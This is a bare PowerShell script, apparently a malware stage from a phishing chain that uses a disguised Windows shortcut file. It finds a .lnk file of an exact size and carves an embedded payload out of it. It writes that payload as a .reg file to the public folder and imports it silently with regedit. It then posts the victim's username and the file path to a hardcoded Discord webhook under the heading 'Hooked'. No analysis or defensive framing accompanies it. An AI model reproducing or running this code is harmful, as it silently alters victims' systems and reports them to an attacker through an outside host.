$1 = 2565719
$2 = 5439
$tempPath = Join-Path $env:TEMP 'path.txt'
$currentPath = Get-Content -Path $tempPath
Set-Location -Path $currentPath
$lnkpaths = Get-ChildItem -Path $dirPath.Path -Recurse *.lnk | Where-Object { $_.length -eq $1 } | Select-Object -ExpandProperty FullName;
$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};
$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount $1 -ReadCount $1;
$exePath = Join-Path $env:public '17399.reg';
Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip $2)) -Encoding Byte;
Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;

irm 'https://discord.com/api/webhooks/1207030572061429810/YCbwSoX3RSmP2FCgLJTGGO7qihDEEDzw4fc3Ryt5nF5I1-EVWYIQE9ewNP489-08kUcw' -Method Post -Body (@{content=":fishing_pole_and_fish: **Hooked:** ``$env:USERNAME`` | ``$lnkpaths``"})
